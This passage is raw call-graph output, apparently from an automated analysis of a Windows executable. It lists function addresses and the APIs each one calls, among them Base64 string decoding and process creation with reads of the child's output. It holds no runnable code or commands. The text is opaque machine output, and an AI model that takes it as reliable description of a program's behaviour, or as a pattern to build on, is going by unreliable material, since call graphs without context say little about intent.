_Receive_impl free 5161->5162 5164 7ff670fc39f3 5162->5164 5163->5164 5164->4817 5166 7ff670fc38a6 5165->5166 5170 7ff670fc373f 5165->5170 5212 7ff670fc11c0 ?_Xlength_error@std@@YAXPEBD 5166->5212 5168 7ff670fc37a9 5171 7ff670fcd9f0 4 API calls 5168->5171 5169 7ff670fc38ab 5173 7ff670fc1120 Concurrency::cancel_current_task __std_exception_copy 5169->5173 5170->5168 5172 7ff670fc378f 5170->5172 5174 7ff670fc37d8 5170->5174 5175 7ff670fc379c 5170->5175 5171->5172 5176 7ff670fc385b _invalid_parameter_noinfo_noreturn 5172->5176 5179 7ff670fc3862 memmove 5172->5179 5180 7ff670fc380d memmove memset 5172->5180 5178 7ff670fc38b1 5173->5178 5177 7ff670fcd9f0 4 API calls 5174->5177 5175->5168 5175->5169 5176->5179 5177->5172 5184 7ff670fc3859 5179->5184 5181 7ff670fc384e 5180->5181 5182 7ff670fc3839 5180->5182 5183 7ff670fcda34 _Receive_impl free 5181->5183 5182->5176 5182->5181 5183->5184 5184->4817 5186 7ff670fc2a6e 5185->5186 5187 7ff670fc2b49 5186->5187 5193 7ff670fc2a84 5186->5193 5213 7ff670fc11c0 ?_Xlength_error@std@@YAXPEBD 5187->5213 5188 7ff670fc2a8a 5188->4823 5190 7ff670fc2b4e 5194 7ff670fc1120 Concurrency::cancel_current_task __std_exception_copy 5190->5194 5191 7ff670fc2aba 5195 7ff670fcd9f0 4 API calls 5191->5195 5192 7ff670fc2b1e memmove 5192->4823 5193->5188 5193->5190 5193->5191 5193->5192 5196 7ff670fc2b19 5193->5196 5198 7ff670fc2b54 5194->5198 5199 7ff670fc2ad0 5195->5199 5197 7ff670fcd9f0 4 API calls 5196->5197 5197->5192 5214 7ff670fc2870 5198->5214 5201 7ff670fc2b12 _invalid_parameter_noinfo_noreturn 5199->5201 5202 7ff670fc2ad8 5199->5202 5201->5196 5202->5192 5204 7ff670fc2bdb 5204->4823 5205 7ff670fc2bca 5206 7ff670fcda34 _Receive_impl free 5205->5206 5206->5204 5224 7ff670fc1250 __std_exception_copy 5207->5224 5215 7ff670fc28df ??1?$basic_streambuf@DU?$char_traits@D@std@@@std@@UEAA 5214->5215 5219 7ff670fc2889 5214->5219 5216 7ff670fc2920 _invalid_parameter_noinfo_noreturn 5215->5216 5217 7ff670fc2974 ??1?$basic_iostream@DU?$char_traits@D@std@@@std@@UEAA ??1?$basic_ios@DU?$char_traits@D@std@@@std@@UEAA 5216->5217 5218 7ff670fc2943 5216->5218 5217->5204 5217->5205 5220 7ff670fc296c 5218->5220 5222 7ff670fc298b _invalid_parameter_noinfo_noreturn 5218->5222 5219->5216 5221 7ff670fcda34 _Receive_impl free 5219->5221 5223 7ff670fcda34 _Receive_impl free 5220->5223 5221->5215 5223->5217 5225 7ff670fcd9d0 Concurrency::cancel_current_task 8 API calls 5224->5225 5226 7ff670fc12b2 _CxxThrowException __std_exception_copy 5225->5226 5226->4813 5228 7ff670fc3223 memmove 5227->5228 5229 7ff670fc3262 5227->5229 5228->4865 5231 7ff670fc38c0 12 API calls 5229->5231 5232 7ff670fc3275 5231->5232 5232->4865 5234 7ff670fc3de8 5233->5234 5238 7ff670fc3cb0 5233->5238 5253 7ff670fc11c0 ?_Xlength_error@std@@YAXPEBD 5234->5253 5236 7ff670fc3d15 5239 7ff670fcd9f0 4 API calls 5236->5239 5237 7ff670fc3ded 5241 7ff670fc1120 Concurrency::cancel_current_task __std_exception_copy 5237->5241 5238->5236 5240 7ff670fc3cfb 5238->5240 5242 7ff670fc3d40 5238->5242 5243 7ff670fc3d08 5238->5243 5239->5240 5244 7ff670fc3dad _invalid_parameter_noinfo_noreturn 5240->5244 5247 7ff670fc3db4 memmove memmove 5240->5247 5248 7ff670fc3d67 memmove memmove 5240->5248 5246 7ff670fc3df3 5241->5246 5245 7ff670fcd9f0 4 API calls 5242->5245 5243->5236 5243->5237 5244->5247 5245->5240 5252 7ff670fc3dab 5247->5252 5249 7ff670fc3da0 5248->5249 5250 7ff670fc3d8b 5248->5250 5251 7ff670fcda34 _Receive_impl free 5249->5251 5250->5244 5250->5249 5251->5252 5252->4846 5255 7ff670fc30bd memmove 5254->5255 5259 7ff670fc30e7 5254->5259 5255->4890 5256 7ff670fc31ec 5289 7ff670fc11c0 ?_Xlength_error@std@@YAXPEBD 5256->5289 5259->5256 5263 7ff670fc3141 5259->5263 5264 7ff670fc3179 5259->5264 5265 7ff670fc3133 5259->5265 5260 7ff670fc31f1 5266 7ff670fc1120 Concurrency::cancel_current_task __std_exception_copy 5260->5266 5261 7ff670fcd9f0 4 API calls 5261->5265 5262 7ff670fc3181 memmove 5267 7ff670fc31cf 5262->5267 5268 7ff670fc31a2 5262->5268 5263->5260 5263->5261 5271 7ff670fcd9f0 4 API calls 5264->5271 5265->5262 5269 7ff670fc31e5 _invalid_parameter_noinfo_noreturn 5265->5269 5270 7ff670fc31f7 5266->5270 5267->4890 5268->5269 5272 7ff670fc31c7 5268->5272 5269->5256 5271->5265 5273 7ff670fcda34 _Receive_impl free 5272->5273 5273->5267 5275 7ff670fc331f ?good@ios_base@std@ 5274->5275 5276 7ff670fc3318 5274->5276 5277 7ff670fc3333 5275->5277 5283 7ff670fc3361 5275->5283 5276->5275 5282 7ff670fc3349 ?flush@?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV12 ?good@ios_base@std@ 5277->5282 5277->5283 5278 7ff670fc343a ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QEAAXH_N ?uncaught_exceptions@std@ 5280 7ff670fc3474 5278->5280 5281 7ff670fc346a ?_Osfx@?$basic_ostream@DU?$char_traits@D@std@@@std@ 5278->5281 5279 7ff670fc33d4 ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD 5285 7ff670fc33f4 5279->5285 5280->4890 5281->5280 5282->5283 5283->5278 5283->5279 5284 7ff670fc342a 5283->5284 5286 7ff670fc33d1 5283->5286 5287 7ff670fc33a4 ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD 5283->5287 5284->5278 5285->5284 5288 7ff670fc33fd ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD 5285->5288 5286->5279 5287->5283 5288->5285 5292 7ff670fc6045 CryptStringToBinaryA 5291->5292 5293 7ff670fc6042 5291->5293 5294 7ff670fc6073 5292->5294 5295 7ff670fc619b 5292->5295 5293->5292 5296 7ff670fc60b0 CryptStringToBinaryA 5294->5296 5623 7ff670fcc8d0 5294->5623 5297 7ff670fc11e0 9 API calls 5295->5297 5302 7ff670fc6178 5296->5302 5303 7ff670fc60ed 5296->5303 5300 7ff670fc61ac _CxxThrowException 5297->5300 5301 7ff670fc6098 memset 5301->5296 5639 7ff670fc11e0 __std_exception_copy 5302->5639 5305 7ff670fc34a0 8 API calls 5303->5305 5309 7ff670fc610d 5305->5309 5307 7ff670fc614d 5310 7ff670fcd9d0 Concurrency::cancel_current_task 8 API calls 5307->5310 5308 7ff670fc6148 5312 7ff670fcda34 _Receive_impl free 5308->5312 5309->5307 5309->5308 5311 7ff670fc6141 _invalid_parameter_noinfo_noreturn 5309->5311 5313 7ff670fc6160 5310->5313 5311->5308 5312->5307 5313->4917 5313->4918 5313->4920 5315 7ff670fca67d 5314->5315 5316 7ff670fcaad9 5315->5316 5317 7ff670fca73d 5315->5317 5318 7ff670fca6b7 5315->5318 5340 7ff670fca9be 5315->5340 5319 7ff670fcd9d0 Concurrency::cancel_current_task 8 API calls 5316->5319 5322 7ff670fcab03 5317->5322 5323 7ff670fca759 5317->5323 5346 7ff670fca766 5317->5346 5320 7ff670fca6e7 5318->5320 5318->5322 5326 7ff670fca6da 5318->5326 5321 7ff670fc7195 5319->5321 5354 7ff670fca734 5320->5354 5653 7ff670fcccf0 5320->5653 5321->4923 5683 7ff670fcaec0 ?_Xlength_error@std@@YAXPEBD 5322->5683 5328 7ff670fcc3a0 5 API calls 5323->5328 5324 7ff670fca9e1 5331 7ff670fcaa9b 5324->5331 5337 7ff670fcaa45 5324->5337 5344 7ff670fca9ef 5324->5344 5325 7ff670fcaaaa 5327 7ff670fcc470 19 API calls 5325->5327 5643 7ff670fcc3a0 5326->5643 5334 7ff670fcaabf 5327->5334 5328->5346 5329 7ff670fca9b5 5677 7ff670fcaee0 5329->5677 5338 7ff670fcaee0 2 API calls 5331->5338 5339 7ff670fcda34 _Receive_impl free 5334->5339 5342 7ff670fcaa76 5337->5342 5347 7ff670fcaa94 _invalid_parameter_noinfo_noreturn 5337->5347 5350 7ff670fcaa30 5337->5350 5338->5350 5339->5350 5340->5316 5340->5324 5340->5325 5341 7ff670fcccf0 19 API calls 5341->5346 5348 7ff670fcda34 _Receive_impl free 5342->5348 5343 7ff670fcda34 _Receive_impl free 5343->5316 5344->5316 5345 7ff670fcaa28 5344->5345 5344->5347 5344->5350 5349 7ff670fcda34 _Receive_impl free 5345->5349 5346->5341 5346->5354 5347->5331 5348->5350 5349->5350 5350->5343 5351 7ff670fcccf0 19 API calls 5351->5354 5353 7ff670fc7080 19 API calls 5353->5354 5354->5329 5354->5351 5354->5353 5669 7ff670fcc470 5354->5669 5356 7ff670fca640 20 API calls 5355->5356 5357 7ff670fc64bd 5356->5357 5358 7ff670fcd9f0 4 API calls 5357->5358 5359 7ff670fc64d5 5358->5359 5360 7ff670fc34a0 8 API calls 5359->5360 5361 7ff670fc6510 5360->5361 5362 7ff670fca640 20 API calls 5361->5362 5363 7ff670fc6538 5362->5363 5364 7ff670fc8e00 55 API calls 5363->5364 5365 7ff670fc657f 5364->5365 5366 7ff670fca640 20 API calls 5365->5366 5367 7ff670fc65ab 5366->5367 5368 7ff670fcd9f0 4 API calls 5367->5368 5369 7ff670fc65c3 5368->5369 5370 7ff670fc34a0 8 API calls 5369->5370 5371 7ff670fc65fe 5370->5371 5372 7ff670fca640 20 API calls 5371->5372 5373 7ff670fc662c 5372->5373 5696 7ff670fcbc80 5373->5696 5376 7ff670fc8e00 55 API calls 5377 7ff670fc6678 5376->5377 5378 7ff670fca640 20 API calls 5377->5378 5379 7ff670fc66a4 5378->5379 5380 7ff670fcd9f0 4 API calls 5379->5380 5381 7ff670fc66bc 5380->5381 5382 7ff670fc34a0 8 API calls 5381->5382 5383 7ff670fc66f7 5382->5383 5703 7ff670fc8dd0 5383->5703 5385 7ff670fc671e 5706 7ff670fc8550 5385->5706 5389 7ff670fc677b 5390 7ff670fcaf70 20 API calls 5389->5390 5391 7ff670fc678f 5390->5391 5392 7ff670fcb050 28 API calls 5391->5392 5393 7ff670fc67a0 5392->5393 5394 7ff670fc8550 55 API calls 5393->5394 5395 7ff670fc67df 5394->5395 5396 7ff670fc8550 55 API calls 5395->5396 5397 7ff670fc681e 5396->5397 5398 7ff670fc8550 55 API calls 5397->5398 5399 7ff670fc685d 5398->5399 5400 7ff670fc8e00 55 API calls 5399->5400 5401 7ff670fc689b 5400->5401 5402 7ff670fca640 20 API calls 5401->5402 5434 7ff670fc694e 5402->5434 5403 7ff670fc6e07 5404 7ff670fca640 20 API calls 5403->5404 5431 7ff670fc6ffd 5403->5431 5406 7ff670fc6e47 5404->5406 5405 7ff670fcd9d0 Concurrency::cancel_current_task 8 API calls 5407 7ff670fc7049 5405->5407 5408 7ff670fcd9f0 __std_exception_copy malloc free _CxxThrowException 5406->5408 5436 7ff670fc8e00 5407->5436 5410 7ff670fc6e60 5408->5410 5409 7ff670fcc6e0 50 API calls 5409->5434 5411 7ff670fc34a0 8 API calls 5410->5411 5413 7ff670fc6e9b 5411->5413 5412 7ff670fca640 20 API calls 5412->5434 5414 7ff670fca640 20 API calls 5413->5414 5415 7ff670fc6ed0 5414->5415 5416 7ff670fcd9f0 __std_exception_copy malloc free _CxxThrowException 5415->5416 5417 7ff670fc6ee9 5416->5417 5418 7ff670fc2a40 13 API calls 5417->5418 5419 7ff670fc6f0d 5418->5419 5420 7ff670fc8e00 55 API calls 5419->5420 5421 7ff670fc6f53 5420->5421 5423 7ff670fc8e00 55 API calls 5421->5423 5422 7ff670fc2a40 13 API calls 5422->5434 5424 7ff670fc6f92 5423->5424 5425 7ff670fc34a0 8 API calls 5424->5425 5426 7ff670fc6fc6 5425->5426 5427 7ff670fcc6e0 50 API calls 5426->5427 5428 7ff670fc6fd5 5427->5428 5429 7ff670fca640 20 API calls 5428->5429 5429->5431 5430 7ff670fcd9f0 __std_exception_copy malloc free _CxxThrowException 5430->5434 5431->5405 5432 7ff670fc34a0 8 API calls 5432->5434 5433 7ff670fc8e00 55 API calls 5433->5434 5434->5403 5434->5409 5434->5412 5434->5422 5434->5430 5434->5432 5434->5433 5435 7ff670fc8720 71 API calls 5434->5435 5435->5434 5442 7ff670fc8e5b 5436->5442 5437 7ff670fc9056 5438 7ff670fcd9f0 4 API calls 5437->5438 5440 7ff670fc906c 5438->5440 5439 7ff670fc8eff 5711 7ff670fcbc00 5439->5711 5443 7ff670fc9051 5440->5443 5730 7ff670fcd610 5440->5730 5442->5437 5442->5439 5448 7ff670fc9138 5442->5448 5445 7ff670fcd9d0 Concurrency::cancel_current_task 8 API calls 5443->5445 5447 7ff670fc9118 5445->5447 5446 7ff670fc90b1 5446->5443 5450 7ff670fcab10 8 API calls 5446->5450 5447->4930 5452 7ff670fcb3b0 16 API calls 5448->5452 5450->5446 5453 7ff670fc9150 5452->5453 5746 7ff670fcbff0 5453->5746 5455 7ff670fc9133 5744 7ff670fc5680 ?_Xlength_error@std@@YAXPEBD 5455->5744 5458 7ff670fcd9f0 4 API calls 5460 7ff670fc8f09 5458->5460 5460->5443 5460->5455 5460->5458 5464 7ff670fca640 20 API calls 5460->5464 5718 7ff670fcab10 5460->5718 5722 7ff670fcd320 5460->5722 5726 7ff670fcd540 5460->5726 5461 7ff670fc91b1 5463 7ff670fc91d6 5461->5463 5466 7ff670fc91f1 _invalid_parameter_noinfo_noreturn 5461->5466 5462 7ff670fc91de 5462->4930 5465 7ff670fcda34 _Receive_impl free 5463->5465 5464->5460 5465->5462 5467 7ff670fc7080 20 API calls 5466->5467 5468 7ff670fc9212 5467->5468 5469 7ff670fc9248 5468->5469 5470 7ff670fc9240 5468->5470 5471 7ff670fc9261 _invalid_parameter_noinfo_noreturn 5468->5471 5469->4930 5472 7ff670fcda34 _Receive_impl free 5470->5472 5774 7ff670fc92a0 __std_exception_copy __std_exception_copy 5471->5774 5472->5469 5474 7ff670fc927e 5474->4930 5476 7ff670fcb14e ?good@ios_base@std@ 5475->5476 5477 7ff670fcb147 5475->5477 5478 7ff670fcb190 5476->5478 5479 7ff670fcb162 5476->5479 5477->5476 5480 7ff670fcb19e ?getloc@ios_base@std@@QEBA?AVlocale@2 ??0_Lockit@std@@QEAA@H ??Bid@locale@std@ 5478->5480 5481 7ff670fcb346 ?uncaught_exceptions@std@ 5478->5481 5479->5478 5485 7ff670fcb178 ?flush@?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV12 ?good@ios_base@std@ 5479->5485 5482 7ff670fcb1f8 5480->5482 5483 7ff670fcb350 ?_Osfx@?$basic_ostream@DU?$char_traits@D@std@@@std@ 5481->5483 5484 7ff670fcb35a 5481->5484 5486 7ff670fcb280 ??1_Lockit@std@@QEAA 5482->5486 5487 7ff670fcb21b 5482->5487 5488 7ff670fcb20f ?_Getgloballocale@locale@std@@CAPEAV_Locimp@12 5482->5488 5483->5484 5490 7ff670fcd9d0 Concurrency::cancel_current_task 8 API calls 5484->5490 5485->5478 5489 7ff670fcb2b6 ?put@?$time_put@DV?$ostreambuf_iterator@DU?$char_traits@D@std@@@std@@@std@@QEBA?AV?$ostreambuf_iterator@DU?$char_traits@D@std@@@2@V32@AEAVios_base@2@DPEBUtm@@PEBD3 5486->5489 5500 7ff670fcb299 5486->5500 5487->5486 5494 7ff670fcb235 ?_Getcat@?$time_put@DV?$ostreambuf_iterator@DU?$char_traits@D@std@@@std@@@std@@SA_KPEAPEBVfacet@locale@2@PEBV42@ 5487->5494 5488->5487 5492 7ff670fcb33f 5489->5492 5493 7ff670fcb326 ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QEAAXH_N 5489->5493 5491 7ff670fc74cf 5490->5491 5491->4942 5491->4943 5492->5481 5493->5492 5495 7ff670fcb250 5494->5495 5496 7ff670fcb39d 5494->5496 5849 7ff670fcd7e8 malloc 5495->5849 5851 7ff670fc5620 5496->5851 5499 7ff670fcb3a2 5500->5489 5501 7ff670fcb268 5501->5486 5503 7ff670fcc71a 5502->5503 5504 7ff670fcc722 5502->5504 5505 7ff670fcbc00 12 API calls 5503->5505 5506 7ff670fcc88d 5504->5506 5507 7ff670fcd320 memcmp 5504->5507 5505->5504 5855 7ff670fccea0 5506->5855 5508 7ff670fcc743 5507->5508 5509 7ff670fcc76f 5508->5509 5511 7ff670fcd540 memcmp 5508->5511 5512 7ff670fcc888 5509->5512 5514 7ff670fcd9f0 4 API calls 5509->5514 5522 7ff670fcc7e1 5509->5522 5511->5509 5515 7ff670fc5680 ?_Xlength_error@std@@YAXPEBD 5512->5515 5518 7ff670fcc7a2 5514->5518 5515->5506 5516 7ff670fcb470 39 API calls 5517 7ff670fcc8bd _CxxThrowException 5516->5517 5519 7ff670fc9f80 40 API calls 5518->5519 5519->5522 5520 7ff670fcc846 5521 7ff670fcd9d0 Concurrency::cancel_current_task 8 API calls 5520->5521 5526 7ff670fc7625 5521->5526 5522->5520 5523 7ff670fcc83e 5522->5523 5524 7ff670fcc881 _invalid_parameter_noinfo_noreturn 5522->5524 5525 7ff670fcda34 _Receive_impl free 5523->5525 5524->5512 5525->5520 5526->4952 5526->4955 5528 7ff670fcd9f0 4 API calls 5527->5528 5529 7ff670fc8b5e localeconv 5528->5529 5530 7ff670fc8bf2 memset 5529->5530 5532 7ff670fcd9f0 4 API calls 5530->5532 5533 7ff670fc8c4a memset 5532->5533 5534 7ff670fc8c9a 5533->5534 5535 7ff670fc8d4f 5534->5535 5536 7ff670fc8d4a 5534->5536 5538 7ff670fc8d43 _invalid_parameter_noinfo_noreturn 5534->5538 5537 7ff670fcd9d0 Concurrency::cancel_current_task 8 API calls 5535->5537 5539 7ff670fcda34 _Receive_impl free 5536->5539 5540 7ff670fc8dab 5537->5540 5538->5536 5539->5535 5540->4978 5542 7ff670fc6410 5541->5542 5543 7ff670fc6238 CreateProcessA 5541->5543 5544 7ff670fc11e0 9 API calls 5542->5544 5545 7ff670fc63dc CloseHandle CloseHandle 5543->5545 5546 7ff670fc62bc CloseHandle ReadFile 5543->5546 5548 7ff670fc6421 _CxxThrowException 5544->5548 5547 7ff670fc11e0 9 API calls 5545->5547 5549 7ff670fc6305 5546->5549 5550 7ff670fc6384 WaitForSingleObject CloseHandle CloseHandle CloseHandle 5546->5550 5552 7ff670fc63fe _CxxThrowException 5547->5552 5549->5550 5554 7ff670fc6335 memmove 5549->5554 5555 7ff670fc38c0 12 API calls 5549->5555 5551 7ff670fcd9d0 Concurrency::cancel_current_task 8 API calls 5550->5551 5553 7ff670fc63c4 5551->5553 5552->5542 5553->5013 5556 7ff670fc6362 ReadFile 5554->5556 5555->5556 5556->5549 5556->5550 5560 7ff670fc3af6 ?good@ios_base@std@ 5557->5560 5559 7ff670fc3b2f 5561 7ff670fc3b45 ?flush@?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV12 ?good@ios_base@std@ 5559->5561 5567 7ff670fc3b5d 5559->5567 5560->5559 5560->5567 5561->5567 5563 7ff670fc3bb7 ?sputn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAA_JPEBD_J 5565 7ff670fc3b67 ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QEAAXH_N ?uncaught_exceptions@std@ 5563->5565 5570 7ff670fc3ba7 5563->5570 5564 7ff670fc3b8b ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD 5564->5567 5564->5570 5566 7ff670fc3c41 ?_Osfx@?$basic_ostream@DU?$char_traits@D@std@@@std@ 5565->5566 5569 7ff670fc3c4b ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z 5565->5569 5566->5569 5567->5563 5567->5564 5567->5565 5568 7ff670fc3bd9 ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD 5568->5565 5568->5570 5569->5021 5569->5022 5570->5565 5570->5568 5572 7ff670fccce8 5571->5572 5575 7ff670fccbde 5571->5575 5573 7ff670fc1120 Concurrency::cancel_current_task __std_exception_copy 5572->5573 5574 7ff670fccced 5573->5574 5575->5572 5576 7ff670fcd9f0 __std_exception_copy malloc free _CxxThrowException 5575->5576 5577 7ff670fc9f80 40 API calls 5575->5577 5578 7ff670fccce1 _invalid_parameter_noinfo_noreturn 5575->5578 5576->5575 5577->5575 5578->5572 5580 7ff670fca047 5579->5580 5581 7ff670fc9f98 5579->5581 5580->5581 5863 7ff670fc2a00 5580->5863 5581->4957 5587 7ff670fcb400 5586->5587 5587->5587 5588 7ff670fcb41c 5587->5588 5589 7ff670fcb6a0 9 API calls 5587->5589 5590 7ff670fc3200 13 API calls 5588->5590 5589->5588 5591 7ff670fcb435 5590->5591 5592 7ff670fc3200 13 API calls 5591->5592 5593 7ff670fc7dd0 5592->5593 5594 7ff670fcb470 5593->5594 5595 7ff670fc34a0 8 API calls 5594->5595 5596 7ff670fcb4c0 5595->5596 5597 7ff670fc34a0 8 API calls 5596->5597 5598 7ff670fcb4e6 5597->5598 5599 7ff670fc56c0 31 API calls 5598->5599 5600 7ff670fcb4f7 5599->5600 5601 7ff670fccac0 16 API calls 5600->5601 5602 7ff670fcb50b 5601->5602 5603 7ff670fcb545 5602->5603 5605 7ff670fcb53e _invalid_parameter_noinfo_noreturn 5602->5605 5608 7ff670fcb54a 5602->5608 5606 7ff670fcda34 _Receive_impl free 5603->5606 5604 7ff670fcb5d8 __std_exception_copy 5612 7ff670fcb671 5604->5612 5613 7ff670fcb63d 5604->5613 5605->5603 5606->5608 5607 7ff670fcb594 5610 7ff670fcda34 _Receive_impl free 5607->5610 5608->5607 5609 7ff670fcb58d _invalid_parameter_noinfo_noreturn 5608->5609 5615 7ff670fcb599 5608->5615 5609->5607 5610->5615 5611 7ff670fcb5d3 5617 7ff670fcda34 _Receive_impl free 5611->5617 5614 7ff670fcd9d0 Concurrency::cancel_current_task 8 API calls 5612->5614 5618 7ff670fcb66c 5613->5618 5620 7ff670fcb665 _invalid_parameter_noinfo_noreturn 5613->5620 5619 7ff670fc7de6 _CxxThrowException 5614->5619 5615->5604 5615->5611 5616 7ff670fcb5cc _invalid_parameter_noinfo_noreturn 5615->5616 5616->5611 5617->5604 5621 7ff670fcda34 _Receive_impl free 5618->5621 5619->4971 5620->5618 5621->5612 5624 7ff670fcc8ef 5623->5624 5625 7ff670fcc94d 5623->5625 5627 7ff670fcc92c 5624->5627 5628 7ff670fcc952 5624->5628 5629 7ff670fcc90a 5624->5629 5636 7ff670fcc8f4 5624->5636 5642 7ff670fcaec0 ?_Xlength_error@std@@YAXPEBD 5625->5642 5630 7ff670fcd9f0 4 API calls 5627->5630 5632 7ff670fc1120 Concurrency::cancel_current_task __std_exception_copy 5628->5632 5631 7ff670fcd9f0 4 API calls 5629->5631 5630->5636 5633 7ff670fcc90f 5631->5633 5634 7ff670fcc958 5632->5634 5635 7ff670fcc925 _invalid_parameter_noinfo_noreturn 5633->5635 5633->5636 5637 7ff670fcc982 5634->5637 5638 7ff670fcda34 _Receive_impl free 5634->5638 5635->5627 5636->5301 5637->5301 5638->5637 5640 7ff670fcd9d0 Concurrency::cancel_current_task 8 API calls 5639->5640 5641 7ff670fc123e _CxxThrowException 5640->5641 5641->5295 5644 7ff670fcc3de 5643->5644 5648 7ff670fcc3d3 5643->5648 5645 7ff670fc1120 Concurrency::cancel_current_task __std_exception_copy 5644->5645 5647 7ff670fcc46e 5645->5647 5646 7ff670fcc419 5649 7ff670fcd9f0 4 API calls 5646->5649 5648->5644 5648->5646 5650 7ff670fcd9f0 4 API calls 5648->5650 5649->5644 5651 7ff670fcc3fc 5650->5651 5651->5644 5652 7ff670fcc412 _invalid_parameter_noinfo_noreturn 5651->5652 5652->5646 5654 7ff670fcce94 5653->5654 5658 7ff670fccd2b 5653->5658 5692 7ff670fcaec0 ?_Xlength_error@std@@YAXPEBD 5654->5692 5655 7ff670fcce99 5657 7ff670fc1120 Concurrency::cancel_current_task __std_exception_copy 5655->5657 5659 7ff670fcce9f 5657->5659 5658->5655 5660 7ff670fccdc1 5658->5660 5661 7ff670fccd9f 5658->5661 5664 7ff670fccd84 5658->5664 5662 7ff670fcd9f0 4 API calls 5660->5662 5663 7ff670fcd9f0 4 API calls 5661->5663 5662->5664 5665 7ff670fccda7 5663->5665 5664->5664 5684 7ff670fcc620 5664->5684 5665->5664 5667 7ff670fccdba _invalid_parameter_noinfo_noreturn 5665->5667 5667->5660 5674 7ff670fcc48c 5669->5674 5675 7ff670fcc518 5669->5675 5670 7ff670fcc470 19 API calls 5670->5674 5671 7ff670fc7080 19 API calls 5671->5674 5672 7ff670fcda34 free _Receive_impl 5672->5674 5673 7ff670fcc52a _invalid_parameter_noinfo_noreturn 5676 7ff670fcc549 5673->5676 5674->5670 5674->5671 5674->5672 5674->5673 5674->5675 5675->5354 5676->5354 5678 7ff670fcaef5 5677->5678 5682 7ff670fcaf4d 5677->5682 5679 7ff670fcaf48 5678->5679 5680 7ff670fcaf65 _invalid_parameter_noinfo_noreturn 5678->5680 5681 7ff670fcda34 _Receive_impl free 5679->5681 5681->5682 5682->5340 5685 7ff670fcc69f 5684->5685 5686 7ff670fcc647 5684->5686 5685->5320 5687 7ff670fcc666 5686->5687 5693 7ff670fc7080 5686->5693 5689 7ff670fcc697 5687->5689 5690 7ff670fcc6cc _invalid_parameter_noinfo_noreturn 5687->5690 5691 7ff670fcda34 _Receive_impl free 5689->5691 5691->5685 5694 7ff670fca640 20 API calls 5693->5694 5695 7ff670fc7090 5694->5695 5695->5686 5697 7ff670fcd9f0 4 API calls 5696->5697 5698 7ff670fcbca7 5697->5698 5699 7ff670fc34a0 8 API calls 5698->5699 5700 7ff670fcbcdb 5699->5700 5701 7ff670fcd9d0 Concurrency::cancel_current_task 8 API calls 5700->5701 5702 7ff670fc6635 5701->5702 5702->5376 5704 7ff670fc8e00 55 API calls 5703->5704 5705 7ff670fc8dee 5704->5705 5705->5385 5707 7ff670fc8e00 55 API calls 5706->5707 5708 7ff670fc6767 5707->5708 5709 7ff670fcaf70 5708->5709 5710 7ff670fca640 20 API calls 5709->5710 5712 7ff670fcd9f0 4 API calls 5711->5712 5713 7ff670fcbc27 5712->5713 5714 7ff670fcd9f0 4 API calls 5713->5714 5715 7ff670fcbc4c 5714->5715 5716 7ff670fcd9d0 Concurrency::cancel_current_task 8 API calls 5715->5716 5717 7ff670fcbc70 5716->5717 5717->5460 5719 7ff670fcab58 5718->5719 5720 7ff670fcd9d0 Concurrency::cancel_current_task 8 API calls 5719->5720 5721 7ff670fcadc8 5720->5721 5721->5460 5723 7ff670fcd356 5722->5723 5725 7ff670fcd3ce 5722->5725 5724 7ff670fcd386 memcmp 5723->5724 5723->5725 5724->5723 5725->5460 5728 7ff670fcd55b memcmp 5726->5728 5729 7ff670fcd585 5728->5729 5729->5460 5731 7ff670fcd62f 5730->5731 5732 7ff670fcd691 5730->5732 5734 7ff670fcd670 5731->5734 5735 7ff670fcd696 5731->5735 5736 7ff670fcd64e 5731->5736 5742 7ff670fcd638 5731->5742 5775 7ff670fcaec0 ?_Xlength_error@std@@YAXPEBD 5732->5775 5737 7ff670fcd9f0 4 API calls 5734->5737 5738 7ff670fc1120 Concurrency::cancel_current_task __std_exception_copy 5735->5738 5739 7ff670fcd9f0 4 API calls 5736->5739 5737->5742 5740 7ff670fcd69c 5738->5740 5741 7ff670fcd653 5739->5741 5741->5742 5743 7ff670fcd669 _invalid_parameter_noinfo_noreturn 5741->5743 5742->5446 5743->5734 5745 7ff670fc56ae 5744->5745 5745->5448 5747 7ff670fc34a0 8 API calls 5746->5747 5748 7ff670fcc041 5747->5748 5749 7ff670fc34a0 8 API calls 5748->5749 5750 7ff670fcc067 5749->5750 5776 7ff670fc56c0 5750->5776 5755 7ff670fcc0ce 5757 7ff670fcc11d 5755->5757 5761 7ff670fcc118 5755->5761 5766 7ff670fcc111 _invalid_parameter_noinfo_noreturn 5755->5766 5756 7ff670fcc0c9 5760 7ff670fcda34 _Receive_impl free 5756->5760 5758 7ff670fcc15c __std_exception_copy 5757->5758 5763 7ff670fcc157 5757->5763 5768 7ff670fcc150 _invalid_parameter_noinfo_noreturn 5757->5768 5764 7ff670fcc1c5 5758->5764 5765 7ff670fcc1f9 5758->5765 5759 7ff670fcc0c2 _invalid_parameter_noinfo_noreturn 5759->5756 5760->5755 5762 7ff670fcda34 _Receive_impl free 5761->5762 5762->5757 5769 7ff670fcda34 _Receive_impl free 5763->5769 5770 7ff670fcc1f4 5764->5770 5772 7ff670fcc1ed _invalid_parameter_noinfo_noreturn 5764->5772 5767 7ff670fcd9d0 Concurrency::cancel_current_task 8 API calls 5765->5767 5766->5761 5771 7ff670fc915d _CxxThrowException 5767->5771 5768->5763 5769->5758 5773 7ff670fcda34 _Receive_impl free 5770->5773 5771->5461 5771->5462 5772->5770 5773->5765 5774->5474 5777 7ff670fc56f6 5776->5777 5777->5777 5808 7ff670fcc990 5777->5808 5779 7ff670fc577c 5780 7ff670fc57b8 5779->5780 5827 7ff670fcb6a0 5779->5827 5782 7ff670fc3200 13 API calls 5780->5782 5783 7ff670fc57d1 5782->5783 5784 7ff670fc3200 13 API calls 5783->5784 5785 7ff670fc57ea 5784->5785 5786 7ff670fc57f7 